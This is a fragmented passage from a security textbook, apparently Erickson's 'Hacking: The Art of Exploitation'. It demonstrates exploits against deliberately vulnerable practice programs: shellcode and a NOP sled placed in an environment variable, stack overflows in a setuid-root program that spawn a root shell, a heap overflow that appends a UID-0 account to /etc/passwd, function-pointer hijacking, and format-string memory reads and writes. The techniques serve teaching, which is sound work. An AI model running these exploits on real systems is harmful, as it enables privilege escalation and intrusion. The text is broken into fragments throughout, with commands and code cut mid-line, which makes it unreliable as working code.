OLDPWD=/home/reader
USER=reader
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;
01:or=4
0;31;01:su=37;41:sg=30;43:tw=30;42:ow=34;42:st=37;44:ex=01;32:*
...
tgz=01;31:
*
...
taz=01;31:*
...
zip=01;31:*
...
Z=01;31:*
...
bz2=01;31:
*
...
rpm=01;31:*
...
jpg=01;35:*
...
gif=01;35:*
...
pbm=01;35:
*
...
ppm=01;35:*
...
xbm=01;35:*
...
tif=01;35:*
...
png=01;35:
*
...
mpg=01;35:*
...
avi=01;35:*
...
gl=01;35:*
...
xcf=01;35:
*
...
flac=01;35:*
...
mpc=01;35:*
...
wav=01;35:
SSH_AUTH_SOCK=/tmp/ssh-EpSEbS7489/agent
...
ICE-unix/7489
USERNAME=reader
DESKTOP_SESSION=default
...
UTF-8
GDMSESSION=default
...
0
MYVAR=test

LESSCLOSE=/usr/bin/lesspipe %s %s
RUNNING_UNDER_GDM=yes
COLORTERM=gnome-terminal
XAUTHORITY=/home/reader/
...
The shellcode from the notesearch exploit
can be used; we just need to put it into a file in binary form
...

reader@hacking:~/booksrc $ head exploit_notesearch
...
h>
#include ...
h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
unsigned int i, *ptr, ret, offset=270;
reader@hacking:~/booksrc $ head exploit_notesearch
...
c | grep "^\"" | cut -d\" -f2
\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68
\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89
\xe1\xcd\x80
reader@hacking:~/booksrc $

The first 10 lines of the program are piped into grep, which only shows the lines
that begin with a quotation mark
...

BASH's for loop can actually be used to send each of these lines to an echo
command, with command-line options to recognize hex expansion and to suppress
adding a newline character to the end
...
c | grep "^\"" | cut -d\"
-f2)
> do
> echo -en $i

> done > shellcode
...
bin
00000000 31 c0 31 db 31 c9 99 b0 a4 cd 80 6a 0b 58 51 68 |1
...
1
...
XQh|
00000010 2f 2f 73 68 68 2f 62 69 6e 89 e3 51 89 e2 53 89 |//shh/bin
...
S
...
|
00000023
reader@hacking:~/booksrc $

Now we have the shellcode in a file called shellcode
...
This can be used with
command substitution to put shellcode into an environment variable, along with a
generous NOP sled
...
bin)
reader@hacking:~/booksrc $ echo $SHELLCODE
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣1␣1␣1␣␣␣ j
XQh//shh/bin␣␣Q␣␣S␣␣
reader@hacking:~/booksrc $

And just like that, the shellcode is now on the stack in an environment variable,
along with a 200-byte NOP sled
...

The environment variables are located near the bottom of the stack, so this is
where we should look when running notesearch in a debugger
...
/notesearch
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
This will
set up memory for the program, but it will stop before anything happens
...

(gdb) i r esp
esp 0xbffff660 0xbffff660
(gdb) x/24s $esp + 0x240
0xbffff8a0: ""
0xbffff8a1: ""
0xbffff8a2: ""
0xbffff8a3: ""
0xbffff8a4: ""
0xbffff8a5: ""
0xbffff8a6: ""
0xbffff8a7: ""
0xbffff8a8: ""
0xbffff8a9: ""
0xbffff8aa: ""
0xbffff8ab: "i686"
0xbffff8b0: "/home/reader/booksrc/notesearch"
0xbffff8d0: "SSH_AGENT_PID=7531"

0xbffffd56: "SHELLCODE=", '\220'
...
gtkrc-1
...
tar=01;31:*
...
arj=01
;31:*
...

0xbffffb29:
"1;31:*
...
zip=01;31:*
...
Z=01;31:*
...
bz2=01;31:*
...
rpm=01;3
1:*
...
jpg=01;35:*
...
gif=01;35:*
...
pbm=01;35:*
...
ppm=01
;35:*
...

(gdb) x/s 0xbffff8e3
0xbffff8e3: "SHELLCODE=", '\220'
...
(When
the program is run outside of the debugger, these addresses might be a little
different
...
But with a 200-byte NOP sled, these inconsistencies
aren't a problem if an address near the middle of the sled is picked
...
After determining the address of the
injected shellcode instructions, the exploitation is simply a matter of overwriting
the return address with this address
...
/notesearch $(perl -e 'print "\x47\xf9\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]------sh-3
...
2#

The target address is repeated enough times to overflow the return address, and
execution returns into the NOP sled in the environment variable, which inevitably
leads to the shellcode
...

This usually makes exploitations quite a bit easier
...
In C's standard library there
is a function called getenv(), which accepts the name of an environment variable
as its only argument and returns that variable's memory address
...
c demonstrates the use of getenv()
...
c
#include ...
h>
int main(int argc, char *argv[]) {
printf("%s is at %p\n", argv[1], getenv(argv[1]));
}

When compiled and run, this program will display the location of a given
environment variable in its memory
...

reader@hacking:~/booksrc $ gcc getenv_example
...
/a
...
/notesearch $(perl -e 'print "\x0b\xf9\xff\xbf"x40')
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
-------[ end of note data ]-------
sh-3
...
This means the environment
prediction is still off
...
bin)
reader@hacking:~/booksrc $
...
out SLEDLESS
SLEDLESS is at 0xbfffff46
reader@hacking:~/booksrc $
...
The length of the name of the program being
executed seems to have an effect on the address of the environment variables
...
This type of experimentation and pattern recognition is an
important skill for a hacker to have
...
out a
reader@hacking:~/booksrc $
...
out bb
reader@hacking:~/booksrc $
...
out ccc
reader@hacking:~/booksrc $
...
/a
...
The
general trend seems to be a decrease of two bytes in the address of the
environment variable for every single-byte increase in the length of the program
name
...
out, since the difference in length
between the names a
...
This must mean the name of
the executing program is also located on the stack somewhere, which is causing
the shifting
...
This means the crutch of a
NOP sled can be eliminated
...
c program adjusts the address based
on the difference in program name length to provide a very accurate prediction
...
c
#include ...
h>
#include ...
*/
ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* Adjust for program name
...
This can be used
to exploit stack-based buffer overflows without the need for a NOP sled
...
c
reader@hacking:~/booksrc $
...
/notesearch
SLEDLESS will be at 0xbfffff3c
reader@hacking:~/booksrc $
...
The use of
environment variables simplifies things considerably when exploiting from the
command line, but these variables can also be used to make exploit code more
reliable
...
c program to execute a
command
...
The -c tells the sh program to execute commands from the
command-line argument passed to it
...
Go to
http://www
...
com/codesearch?q=package:libc+system to see this code in its
entirety
...
2
...
The fork() function starts a
new process, and the execl() function is used to run the command through
/bin/sh with the appropriate command-line arguments
...
If a setuid program uses
system(), the privileges won't be transferred, because /bin/sh has been dropping
privileges since version two
...
We can ignore the fork()
and just focus on the execl() function to run the command
...
The arguments for execl() start
with the path to the target program and are followed by each of the command-line
arguments
...
The last argument is a NULL to
terminate the argument list, similar to how a null byte terminates a string
...
This environment is presented in the form of an array of
pointers to null-terminated strings for each environment variable, and the
environment array itself is terminated with a NULL pointer
...
If the environment array is just the shellcode
as the first string (with a NULL pointer to terminate the list), the only
environment variable will be the shellcode
...
In Linux, the address will be 0xbffffffa, minus the length of the
shellcode in the environment, minus the length of the name of the executed
program
...
All
that's needed in the exploit buffer is the address, repeated enough times to
overflow the return address in the stack, as shown in exploit_nosearch_env
...

exploit_notesearch_env
...
h>
#include ...
h>
#include ...
/notesearch");
for(i=0; i < 160; i+=4)
*((unsigned int *)(buffer+i)) = ret;
execle("
...
Also, it doesn't start any additional processes
...
c
reader@hacking:~/booksrc $
...
out
-------[ end of note data ]-------
sh-3
...
As in
auth_overflow
...
This is true regardless of the
memory segment these variables reside in; however, the control tends to be quite
limited
...
While these types of
overflows aren't as standardized as stack-based overflows, they can be just as
effective
...
Two buffers are allocated on the heap, and the first
command-line argument is copied into the first buffer
...

Excerpt from notetaker
...

strcpy(buffer, argv[1]); // Copy into buffer
...
The
distance between these two addresses is 104 bytes
...
/notetaker test
[DEBUG] buffer @ 0x804a008: 'test'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved
...

reader@hacking:~/booksrc $
...
This causes the datafile to be nothing but
a single null byte, which obviously cannot be opened as a file
...
/notetaker $(perl -e 'print "A"x104
...

*** glibc detected ***
...
so
...
so
...
/notetaker[0x8048916]
/lib/tls/i686/cmov/libc
...
6(__libc_start_main+0xdc)[0xb7eafebc]

...
so
...
so
...
5
...
5
...
5
...
5
...
5
...
This causes the program to write to testfile instead of /var/notes, as
it was originally programmed to do
...
Similar to the return address overwrite with stack overflows, there
are control points within the heap architecture itself
...
Since version 2
...
5, these functions have been
rewritten to print debugging information and terminate the program when they

detect problems with the heap header information
...
However, this particular exploit doesn't use heap header
information to do its magic, so by the time free() is called, the program has
already been tricked into writing to a new file with root privileges
...
c
if(write(fd, buffer, strlen(buffer)) == -1) // Write note
...

// Closing file
if(close(fd) == -1)
fatal("in main() while closing file");
printf("Note has been saved
...
/testfile
-rw------- 1 root reader 118 2007-09-09 16:19
...
/testfile
cat:
...
/testfile
?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA
AAAAAAAAAtestfile
reader@hacking:~/booksrc $

A string is read until a null byte is encountered, so the entire string is written to
the file as the userinput
...
This also means that since the filename can be controlled, data
can be appended to any file
...

There are probably several clever ways to exploit this type of capability
...
This file
contains all of the usernames, IDs, and login shells for all the users of the system
...

reader@hacking:~/booksrc $ cp /etc/passwd /tmp/passwd
...
The password fields are all filled with the x character, since
the encrypted passwords are stored elsewhere in a shadow file
...
) In addition, any entry in the password
file that has a user ID of 0 will be given root privileges
...

The password can be encrypted using a one-way hashing algorithm
...
To prevent lookup attacks, the algorithm uses a salt value, which when varied
creates a different hash value for the same input password
...
The first argument is
the password, and the second is the salt value
...

reader@hacking:~/booksrc $ perl -e 'print crypt("password", "AA")
...
"\n"'
XXq2wKiyI43A2
reader@hacking:~/booksrc $

Notice that the salt value is always at the beginning of the hash
...
Using the salt value from the stored encrypted password, the system uses
the same one-way hashing algorithm to encrypt whatever text the user typed as
the password
...
This allows the password to be
used for authentication without requiring that the password be stored anywhere
on the system
...
The line to append to
/etc/passwd should look something like this:
myroot:XXq2wKiyI43A2:0:0:me:/root:/bin/bash

However, the nature of this particular heap overflow exploit won't allow that exact
line to be written to /etc/passwd, because the string must end with /etc/passwd
...
This can be compensated for with the clever use of a
symbolic file link, so the entry can both end with /etc/passwd and still be a valid
line in the password file
...
This means that a valid

login shell for the password file is also /tmp/etc/passwd, making the following a
valid password file line:
myroot:XXq2wKiyI43A2:0:0:me:/root:/tmp/etc/passwd

The values of this line just need to be slightly modified so that the portion before
/etc/passwd is exactly 104 bytes long:
reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:me:/root:/tmp"' | wc
-c
38
reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:"
...

":/root:/tmp"'
| wc -c
86
reader@hacking:~/booksrc $ gdb -q
(gdb) p 104 - 86 + 50
$1 = 68
(gdb) quit
reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:"
...

":/root:/tmp"'

| wc -c
104
reader@hacking:~/booksrc $

If /etc/passwd is added to the end of that final string (shown in bold), the string
above will be appended to the end of the /etc/passwd file
...

reader@hacking:~/booksrc $
...
"A"x68
...

*** glibc detected ***
...
so
...
so
...
/notetaker[0x8048916]
/lib/tls/i686/cmov/libc
...
6(__libc_start_main+0xdc)[0xb7eafebc]

...
so
...
so
...
5
...
5
...
5
...
5
...
5
...
c program enough, you will realize
that, similar to at a casino, most of the games are statistically weighted in favor of
the house
...

Perhaps there's a way to even the odds a bit
...
This pointer is stored in the user structure,
which is declared as a global variable
...

From game_of_chance
...

// Global variables
struct user player; // Player struct

The name buffer in the user structure is a likely place for an overflow
...

void input_name() {
char *name_ptr, input_char='\n';
while(input_char == '\n') // Flush any leftover
scanf("%c", &input_char); // newline chars
...
name); // name_ptr = player name's address
while(input_char != '\n') { // Loop until newline
...

scanf("%c", &input_char); // Get the next char
...

}
*name_ptr = 0; // Terminate the string
...
There is nothing to limit
it to the length of the destination name buffer, meaning an overflow is possible
...
This happens in the play_the_game()
function, which is called when any game is selected from the menu
...

if((choice < 1) || (choice > 7))
printf("\n[!!] The number %d is an invalid selection
...

if(choice != last_game) { // If the function ptr isn't set,
if(choice == 1) // then point it at the selected game
player
...
current_game = dealer_no_match;
else
player
...

}
play_the_game(); // Play the game
...
This means that in order to
get the program to call the function pointer without overwriting it, a game must
be played first to set the last_game variable
...
/game_of_chance
-=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 70 credits] -> 1
[DEBUG] current_game pointer @ 0x08048fde

####### Pick a Number ######
This game costs 10 credits to play
...

Pick a number between 1 and 20: 5
The winning number is 17
Sorry, you didn't win
...
/game_of_chance
reader@hack ing:~/booksrc $

You can temporarily suspend the current process by pressing CTRL-Z
...
Back at the shell, we
figure out an appropriate overflow buffer, which can be copied and pasted in as a
name later
...
As
the output below shows, the name buffer is 100 bytes from the current_game
pointer within the user structure
...
c
reader@hacking:~/booksrc $ gdb -q
...
out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
c, line 41
...
out
Breakpoint 1, main () at game_of_chance
...

(gdb) p player
$1 = {uid = 0, credits = 0, highscore = 0, name = '\0' ,
current_game = 0}
(gdb) x/x &player
...
current_game
0x804b6d0 : 0x00000000
(gdb) p 0x804b6d0 - 0x804b66c
$2 = 100
(gdb) quit
The program is running
...
This can be copied and pasted into the interactive Game of Chance program
when it is resumed
...

reader@hacking:~/booksrc $ perl -e 'print "A"x100
...
"\n"'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAABBBB
reader@hacking:~/booksrc $ fg

...

-=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB]
[You have 60 credits] -> 1
[DEBUG] current_game pointer @ 0x42424242
Segmentation fault
reader@hacking:~/booksrc $

Select menu option 5 to change the username, and paste in the overflow buffer
...
When menu option 1 is
selected again, the program will crash when it tries to call the function pointer
...

The nm command lists symbols in object files
...

reader@hacking:~/booksrc $ nm game_of_chance
0804b508 d _DYNAMIC
0804b5d4 d _GLOBAL_OFFSET_TABLE_
080496c4 R _IO_stdin_used
w _Jv_RegisterClasses
0804b4f8 d __CTOR_END__
0804b4f4 d __CTOR_LIST__
0804b500 d __DTOR_END__
0804b4fc d __DTOR_LIST__
0804a4f0 r __FRAME_END__
0804b504 d __JCR_END__
0804b504 d __JCR_LIST__
0804b630 A __bss_start
0804b624 D __data_start
08049670 t __do_global_ctors_aux

08048610 t __do_global_dtors_aux
0804b628 D __dso_handle
w __gmon_start__
08049669 T __i686
...
bx
0804b4f4 d __init_array_end
0804b4f4 d __init_array_start
080495f0 T __libc_csu_fini
08049600 T __libc_csu_init
U __libc_start_main@@GLIBC_2
...
0
0804b640 b completed
...
0
08048684 T fatal
080492bf T find_the_ace
08048650 t frame_dummy
080489cc T get_player_data
U getuid@@GLIBC_2
...
0
U open@@GLIBC_2
...
0
U perror@@GLIBC_2
...
0
U rand@@GLIBC_2
...
0
08048aaf T register_new_player
U scanf@@GLIBC_2
...
0
U strcpy@@GLIBC_2
...
0
08048e91 T take_wager
U time@@GLIBC_2
...
0
reader@hacking:~/booksrc $

The jackpot() function is a wonderful target for this exploit
...
Instead, the jackpot() function will just be called
directly, doling out the reward of 100 credits and tipping the scales in the player's

direction
...
The menu selections can be
scripted in a single buffer that is piped to the program's standard input
...
The following example will choose
menu item 1, try to guess the number 7, select n when asked to play again, and
finally select menu item 7 to quit
...
/game_of_chance
-=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 60 credits] ->
[DEBUG] current_game pointer @ 0x08048fde
####### Pick a Number ######
This game costs 10 credits to play
...

Pick a number between 1 and 20: The winning number is 20
Sorry, you didn't win
...

reader@hacking:~/booksrc $

This same technique can be used to script everything needed for the exploit
...
This will overflow
the current_game function pointer, so when the Pick a Number game is played
again, the jackpot() function is called directly
...
"A"x100
...
"1\nn\n"
...
"A"x100
...
"1\nn\n"
...
/game_of_chance
-=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 50 credits] ->
[DEBUG] current_game pointer @ 0x08048fde
####### Pick a Number ######
This game costs 10 credits to play
...

Pick a number between 1 and 20: The winning number is 15
Sorry, you didn't win
...

-=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 40 credits] ->
[DEBUG] current_game po inter @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 140 credits
Would you like to play again? (y/n) -=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game

3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 140 credits] ->
Thanks for playing! Bye
...

reader@hacking:~/booksrc $ perl -e 'print "1\n5\nn\n5\n"
...
"\x70\
x8d\x04\x08\n"
...
"y\n"x10
...
/
game_of_chance
-=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 140 credits] ->
[DEBUG] current_game pointer @ 0x08048fde
####### Pick a Number ######
This game costs 10 credits to play
...

Pick a number between 1 and 20: The winning number is 1
Sorry, you didn't win
...

-=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name

6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 130 credits] ->
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 230 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 330 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 430 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 530 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 630 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 730 credits
Would you like to play aga in? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 830 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 930 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 1030 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70

*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 1130 credits
Would you like to play again? (y/n)
[DEBUG] current_game pointer @ 0x08048d70
*+*+*+*+*+* JACKPOT *+*+*+*+*+*
You have won the jackpot of 100 credits!
You now have 1230 credits
Would you like to play again? (y/n) -=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]
[You have 1230 credits] ->
Change user name
Enter your new name: Your name has been changed
...

reader@hacking:~/booksrc $

As you might have already noticed, this program also runs suid root
...
As with the stackbased overflow, shellcode can be stashed in an environment variable
...
Notice the dash argument following the exploit buffer in the cat
command
...
Even though the root shell doesn't display
its prompt, it is still accessible and still escalates privileges
...
/shellcode
...
/getenvaddr SHELLCODE
...
"A"x100
...
"1\n"' > exploit_buffer
reader@hacking:~/booksrc $ cat exploit_buffer - |
...
Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!
10 credits have been deducted from your account
...

You now have 60 credits
Would you like to play again? (y/n) -=[ Game of Chance Menu ]=1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Jon Erickson]
[You have 60 credits] ->
Change user name
Enter your new name: Your name has been changed
...
Like buffer overflow exploits, format string exploits also depend
on programming mistakes that may not appear to have an obvious impact on
security
...
Although format string
vulnerabilities aren't very common anymore, the following techniques can also be
used in other situations
...
They have been
used extensively with functions like printf() in previous programs
...
Each format parameter expects an additional variable to be passed,
so if there are three format parameters in a format string, there should be three
more arguments to the function (in addition to the format string argument)
...

Paramet er Input Type Out put Type
%d

Value

Decimal

%u

Value

Unsigned decimal

%x

Value

Hexadecimal

%s

Pointer

String

%n

Pointer

Number of bytes written so far

The previous chapter demonstrated the use of the more common format
parameters, but neglected the less common %n format parameter
...
c code demonstrates its use
...
c
#include ...
h>
int main() {
int A = 5, B = 7, count_one, count_two;
// Example of a %n format string

printf("The number of bytes written up to this point X%n is being stored in
count_one, and the number of bytes up to here X%n is being stored in
count_two
...
B is %x
...
The
following is the output of the program's compilation and execution
...
c
reader@hacking:~/booksrc $
...
out
The number of bytes written up to this point X is being stored in count_one, and the
number of
bytes up to here X is being stored in count_two
...
B is 7
...
When a format function
encounters a %n format parameter, it writes the number of bytes that have been
written by the function to the address in the corresponding function argument
...
The
values are then outputted, revealing that 46 bytes are found before the first %n
and 113 before the second
...
B is %x
...
First the value of B, then the address of A,
then the value of A, and finally the address of the format string
...

The format function iterates through the format string one character at a time
...
If a format parameter is
encountered, the appropriate action is taken, using the argument in the stack
corresponding to that parameter
...

But what if only two arguments are pushed to the stack with a format string that
uses three format parameters? Try removing the last argument from the
printf() line for the stack example so it matches the line shown below
...
B is %x
...

reader@hacking:~/booksrc $ sed -e 's/, B)/)/' fmt_uncommon
...
c
reader@hacking:~/booksrc $ diff fmt_uncommon
...
c
14c14
< printf("A is %d and is at %08x
...
\n", A, &A, B);
--> printf("A is %d and is at %08x
...
\n", A, &A);
reader@hacking:~/booksrc $ gcc fmt_uncommon2
...
/a
...

count_one: 46
count_two: 113
A is 5 and is at bffffc24
...

reader@hacking:~/booksrc $

The result is b7fd6ff4
...
This means 0xb7fd6ff4 is the first value found below the stack frame for
the format function
...
It certainly would be a lot
more useful if there were a way to control either the number of arguments passed
to or expected by a format function
...

The Format String Vulnerability

Sometimes programmers use printf(string) instead of printf("%s", string)
to print strings
...
The format function is passed the
address of the string, as opposed to the address of a format string, and it iterates
through the string, printing each character
...
c
...
c
#include ...
h>
#include ...
c
...
c
reader@hacking:~/booksrc $ sudo chown root:root
...
/fmt_vuln
reader@hacking:~/booksrc $
...
But what happens if the string
contains a format parameter? The format function should try to evaluate the
format parameter and access the appropriate function argument by adding to the
frame pointer
...

reader@hacking:~/booksrc $
...
This process can be used repeatedly to
examine stack memory
...
/fmt_vuln $(perl -e 'print "%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x

...

%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
%08x
...
b7fe75fc
...
78383025
...
30252e78
...
2e783830
...
3830252e

...
252e7838
...
78383025
...
30252e78
...
2e783830
...
3830252e

...
2
52e7838
...
78383025
...
30252e78
...
2e783830
...
3830252e
...
252e78
38
...
78383025
...
30252e78
...
2e783830
...
3830252e
...
Remember that each four-byte
word is backward, due to the little-endian architecture
...
Wonder what those bytes are?
reader@hacking:~/booksrc $ printf "\x25\x30\x38\x78\x2e\n"
%08x
...
Because the
format function will always be on the highest stack frame, as long as the format
string has been stored anywhere on the stack, it will be located below the current
frame pointer (at a higher memory address)
...
It is particularly useful if format parameters
that pass by reference are used, such as %s or %n
...

Since it's possible to read the data of the original format string, part of the
original format string can be used to supply an address to the %s format
parameter, as shown here:
reader@hacking:~/booksrc $
...
%08x
...
%08x

The right way to print user-controlled input:
AAAA%08x
...
%08x
...
b7fe75fc
...
41414141
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $

The four bytes of 0x41 indicate that the fourth format parameter is reading from
the beginning of the format string to get its data
...
This will cause the program to crash in a segmentation fault, since
this isn't a valid address
...

reader@hacking:~/booksrc $ env | grep PATH
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
reader@hacking:~/booksrc $
...
/fmt_vuln
PATH will be at 0xbffffdd7
reader@hacking:~/booksrc $
...
%08x
...
%s
The right way to print user-controlled input:
????%08x
...
%08x
...
b7fe75fc
...
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:
/bin:/
usr/games
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $

Here the getenvaddr program is used to get the address for the environment
variable PATH
...

The fourth format parameter of %s reads from the beginning of the format string,
thinking it's the address that was passed as a function argument
...

Now that the distance between the end of the stack frame and the beginning of
the format string memory is known, the field-width arguments can be omitted in
the %x format parameters
...
Using this technique, any memory address can be examined as
a string
...
Now things are getting interesting
...
c program, just begging to be overwritten
...

reader@hacking:~/booksrc $
...
%08x
...
%s
The right way to print user-controlled input:
????%08x
...
%08x
...
b7fe75fc
...
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:
/bin:/
usr/games
[*] test_val @ 0x08049794 = -72 0xffffffb8
reader@hacking:~/booksrc $
...
%08x
...
%n
The right way to print user-controlled input:
??%08x
...
%08x
...
b7fe75fc
...

[*] test_val @ 0x08049794 = 31 0x0000001f
reader@hacking:~/booksrc $

As this shows, the test_val variable can indeed be overwritten using the %n
format parameter
...
This can be controlled to a greater degree by
manipulating the field width option
...
/fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%x%n
The right way to print user-controlled input:
??%x%x%x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc0
[*] test_val @ 0x08049794 = 21 0x00000015
reader@hacking:~/booksrc $
...
/fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%180x%n
The right way to print user-controlled input:
??%x%x%180x%n
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc
0
[*] test_val @ 0x08049794 = 200 0x000000c8
reader@hacking:~/booksrc $
...
These lines, in turn, can be used to control the number of
bytes written before the %n format parameter
...

Looking at the hexadecimal representation of the test_val value, it's apparent
that the least significant byte can be controlled fairly well
...
) This detail can be used to write an entire address
...
In
